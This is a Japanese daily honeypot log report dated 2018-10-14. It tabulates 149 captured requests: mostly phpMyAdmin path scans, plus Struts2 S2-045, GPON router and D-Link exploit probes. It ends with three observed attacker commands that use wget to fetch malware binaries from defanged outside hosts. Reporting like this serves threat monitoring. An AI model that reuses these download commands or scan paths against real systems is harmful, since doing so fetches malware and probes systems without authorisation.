ハニーポットのログ分析(2018/10/14)
WOWhoneypotの2018/10/14(日) (運用131日目)の簡易分析です。
本日の総アクセス件数は 149件です。
主なアクセスは以下です。
・phpMyAdminの調査:97件
・GPONルータの脆弱性(CVE-2018-10561)を突くMirai亜種の攻撃(User-Agent: Hello, World):2件
以下が全アクセスログです。
| 件数 | 日付 | 種別 | リクエスト |
| 23 | 2018-10-14 | Apache Struts2の脆弱性S2-045(CVE-2017-5638)を突く攻撃 | GET /index.action |
| 22 | 2018-10-14 | アクセス | GET / |
| 2 | 2018-10-14 | GPONルータの脆弱性(CVE-2018-10561)を突くMirai亜種の攻撃 | POST /GponForm/diag_Form?images/ |
| 2 | 2018-10-14 | phpMyAdminの調査 | GET /phpMyAdmin-2.6.3/ |
| 2 | 2018-10-14 | phpMyAdminの調査 | GET /phpMyAdmin-2.6.2-rc1/ |
| 1 | 2018-10-14 | phpMyAdminの調査 | GET /websql/ |
| 1 | 2018-10-14 | phpMyAdminの調査 | GET /webdb/ |
| 1 | 2018-10-14 | phpMyAdminの調査 | GET /webadmin/ |
| 1 | 2018-10-14 | phpMyAdminの調査 | GET /test/sqlite/SQLiteManager-1.2.0/SQLiteManager-1.2.0/main.php |
| 1 | 2018-10-14 | phpMyAdminの調査 | GET /sqlweb/ |
| 1 | 2018-10-14 | phpMyAdminの調査 | GET /sqlmanager/ |
| 1 | 2018-10-14 | phpMyAdminの調査 | GET /SQLiteManager/main.php |
| 1 | 2018-10-14 | phpMyAdminの調査 | GET /sqlitemanager/main.php |
| 1 | 2018-10-14 | phpMyAdminの調査 | GET /SQLiteManager-1.2.4/main.php |
| 1 | 2018-10-14 | phpMyAdminの調査 | GET /SQLite/main.php |
| 1 | 2018-10-14 | phpMyAdminの調査 | GET /SQlite/main.php |
| 1 | 2018-10-14 | phpMyAdminの調査 | GET /sqlite/main.php |
| 1 | 2018-10-14 | 調査 | GET /script |
| 1 | 2018-10-14 | クローリング | GET /robots.txt |
| 1 | 2018-10-14 | phpMyAdminの調査 | GET /PMA2005/ |
| 1 | 2018-10-14 | phpMyAdminの調査 | GET /pma2005/ |
| 1 | 2018-10-14 | phpMyAdminの調査 | GET /PMA/ |
| 1 | 2018-10-14 | phpMyAdminの調査 | GET /pma/ |
| 1 | 2018-10-14 | phpMyAdminの調査 | GET /p/m/a/ |
| 1 | 2018-10-14 | phpMyAdminの調査 | GET /phpMyAdmin-2.8.2/ |
| 1 | 2018-10-14 | phpMyAdminの調査 | GET /phpMyAdmin-2.8.1-rc1/ |
| 1 | 2018-10-14 | phpMyAdminの調査 | GET /phpMyAdmin-2.8.1/ |
| 1 | 2018-10-14 | phpMyAdminの調査 | GET /phpMyAdmin-2.8.0-rc2/ |
| 1 | 2018-10-14 | phpMyAdminの調査 | GET /phpMyAdmin-2.8.0-rc1/ |
| 1 | 2018-10-14 | phpMyAdminの調査 | GET /phpMyAdmin-2.8.0-beta1/ |
| 1 | 2018-10-14 | phpMyAdminの調査 | GET /phpMyAdmin-2.8.0.4/ |
| 1 | 2018-10-14 | phpMyAdminの調査 | GET /phpMyAdmin-2.8.0.3/ |
| 1 | 2018-10-14 | phpMyAdminの調査 | GET /phpMyAdmin-2.8.0.2/ |
| 1 | 2018-10-14 | phpMyAdminの調査 | GET /phpMyAdmin-2.8.0.1/ |
| 1 | 2018-10-14 | phpMyAdminの調査 | GET /phpMyAdmin-2.8.0/ |
| 1 | 2018-10-14 | phpMyAdminの調査 | GET /phpMyAdmin-2.7.0-rc1/ |
| 1 | 2018-10-14 | phpMyAdminの調査 | GET /phpMyAdmin-2.7.0-pl2/ |
| 1 | 2018-10-14 | phpMyAdminの調査 | GET /phpMyAdmin-2.7.0-pl1/ |
| 1 | 2018-10-14 | phpMyAdminの調査 | GET /phpMyAdmin-2.7.0-beta1/ |
| 1 | 2018-10-14 | phpMyAdminの調査 | GET /phpMyAdmin-2.7.0/ |
| 1 | 2018-10-14 | phpMyAdminの調査 | GET /phpMyAdmin-2.6.4-rc1/ |
| 1 | 2018-10-14 | phpMyAdminの調査 | GET /phpMyAdmin-2.6.4-pl4/ |
| 1 | 2018-10-14 | phpMyAdminの調査 | GET /phpMyAdmin-2.6.4-pl3/ |
| 1 | 2018-10-14 | phpMyAdminの調査 | GET /phpMyAdmin-2.6.4-pl2/ |
| 1 | 2018-10-14 | phpMyAdminの調査 | GET /phpMyAdmin-2.6.4-pl1/ |
| 1 | 2018-10-14 | phpMyAdminの調査 | GET /phpMyAdmin-2.6.4/ |
| 1 | 2018-10-14 | phpMyAdminの調査 | GET /phpMyAdmin-2.6.3-rc1/ |
| 1 | 2018-10-14 | phpMyAdminの調査 | GET /phpMyAdmin-2.6.3-pl1/ |
| 1 | 2018-10-14 | phpMyAdminの調査 | GET /phpMyAdmin-2.6.2-pl1/ |
| 1 | 2018-10-14 | phpMyAdminの調査 | GET /phpMyAdmin-2.6.2-beta1/ |
| 1 | 2018-10-14 | phpMyAdminの調査 | GET /phpMyAdmin-2.6.2/ |
| 1 | 2018-10-14 | phpMyAdminの調査 | GET /phpMyAdmin-2.6.1-rc2/ |
| 1 | 2018-10-14 | phpMyAdminの調査 | GET /phpMyAdmin-2.6.1-rc1/ |
| 1 | 2018-10-14 | phpMyAdminの調査 | GET /phpMyAdmin-2.6.1-pl3/ |
| 1 | 2018-10-14 | phpMyAdminの調査 | GET /phpMyAdmin-2.6.1-pl2/ |
| 1 | 2018-10-14 | phpMyAdminの調査 | GET /phpMyAdmin-2.6.1-pl1/ |
| 1 | 2018-10-14 | phpMyAdminの調査 | GET /phpMyAdmin-2.6.1/ |
| 1 | 2018-10-14 | phpMyAdminの調査 | GET /phpMyAdmin-2.6.0-rc3/ |
| 1 | 2018-10-14 | phpMyAdminの調査 | GET /phpMyAdmin-2.6.0-rc2/ |
| 1 | 2018-10-14 | phpMyAdminの調査 | GET /phpMyAdmin-2.6.0-rc1/ |
| 1 | 2018-10-14 | phpMyAdminの調査 | GET /phpMyAdmin-2.6.0-pl3/ |
| 1 | 2018-10-14 | phpMyAdminの調査 | GET /phpMyAdmin-2.6.0-pl2/ |
| 1 | 2018-10-14 | phpMyAdminの調査 | GET /phpMyAdmin-2.6.0-pl1/ |
| 1 | 2018-10-14 | phpMyAdminの調査 | GET /phpMyAdmin-2.6.0-beta2/ |
| 1 | 2018-10-14 | phpMyAdminの調査 | GET /phpMyAdmin-2.6.0-beta1/ |
| 1 | 2018-10-14 | phpMyAdminの調査 | GET /phpMyAdmin-2.6.0-alpha2/ |
| 1 | 2018-10-14 | phpMyAdminの調査 | GET /phpMyAdmin-2.6.0-alpha/ |
| 1 | 2018-10-14 | phpMyAdminの調査 | GET /phpMyAdmin-2.6.0/ |
| 1 | 2018-10-14 | phpMyAdminの調査 | GET /phpMyAdmin-2.5.7-pl1/ |
| 1 | 2018-10-14 | phpMyAdminの調査 | GET /phpMyAdmin-2.5.7/ |
| 1 | 2018-10-14 | phpMyAdminの調査 | GET /phpMyAdmin-2.5.6-rc2/ |
| 1 | 2018-10-14 | phpMyAdminの調査 | GET /phpMyAdmin-2.5.6-rc1/ |
| 1 | 2018-10-14 | phpMyAdminの調査 | GET /phpMyAdmin-2.5.6/ |
| 1 | 2018-10-14 | phpMyAdminの調査 | GET /phpMyAdmin-2.5.5-rc2/ |
| 1 | 2018-10-14 | phpMyAdminの調査 | GET /phpMyAdmin-2.5.5-rc1/ |
| 1 | 2018-10-14 | phpMyAdminの調査 | GET /phpMyAdmin-2.5.5-pl1/ |
| 1 | 2018-10-14 | phpMyAdminの調査 | GET /phpMyAdmin-2.5.5/ |
| 1 | 2018-10-14 | phpMyAdminの調査 | GET /phpMyAdmin-2.5.4/ |
| 1 | 2018-10-14 | phpMyAdminの調査 | GET /phpMyAdmin-2.5.1/ |
| 1 | 2018-10-14 | phpMyAdminの調査 | GET /phpMyAdmin-2.2.6/ |
| 1 | 2018-10-14 | phpMyAdminの調査 | GET /phpMyAdmin-2.2.3/ |
| 1 | 2018-10-14 | phpMyAdminの調査 | GET /phpMyAdmin2/ |
| 1 | 2018-10-14 | phpMyAdminの調査 | GET /phpMyAdmin-2/ |
| 1 | 2018-10-14 | phpMyAdminの調査 | GET /phpmyadmin2/ |
| 1 | 2018-10-14 | phpMyAdminの調査 | GET /phpMyAdmin/ |
| 1 | 2018-10-14 | phpMyAdminの調査 | GET /phpmyadmin/ |
| 1 | 2018-10-14 | phpMyAdminの調査 | GET /phpmy-admin/ |
| 1 | 2018-10-14 | phpMyAdminの調査 | GET /php-myadmin/ |
| 1 | 2018-10-14 | phpMyAdminの調査 | GET /php-my-admin/ |
| 1 | 2018-10-14 | phpMyAdminの調査 | GET /phpmanager/ |
| 1 | 2018-10-14 | phpMyAdminの調査 | GET /openserver/phpmyadmin/ |
| 1 | 2018-10-14 | phpMyAdminの調査 | GET /mysqlmanager/ |
| 1 | 2018-10-14 | phpMyAdminの調査 | GET /mysqladmin/ |
| 1 | 2018-10-14 | phpMyAdminの調査 | GET /mysql-admin/ |
| 1 | 2018-10-14 | phpMyAdminの調査 | GET /mysql/ |
| 1 | 2018-10-14 | phpMyAdminの調査 | GET /myadmin/ |
| 1 | 2018-10-14 | phpMyAdminの調査 | GET /main.php |
| 1 | 2018-10-14 | hudsonの調査 | GET /hudson/script |
| 1 | 2018-10-14 | 不正中継の調査 | GET hxxp://www.msftncsi.com/ncsi.txt |
| 1 | 2018-10-14 | D-Linkルータの脆弱性(CVE-2015-2051)の調査 | GET /HNAP1/ |
| 1 | 2018-10-14 | phpMyAdminの調査 | GET /dbadmin/ |
| 1 | 2018-10-14 | phpMyAdminの調査 | GET /agSearch/SQlite/main.php |
| 1 | 2018-10-14 | phpMyAdminの調査 | GET /admin/ |
本日のドメイン名でのアクセスは以下です。
2 GET /
1 GET /robots.txt
本日のハンティングログは以下です。全てStruts2への攻撃で観測しています。
6 2018-10-14 wget -c hxxp://wap.tfddos[.]net:57843/linux
5 2018-10-14 wget -c hxxp://43.226.146[.]23:55335/hhkkkyyy
1 2018-10-14 wget -c hxxp://43.226.144[.]136:4214/RHHEVAFG
以上です。
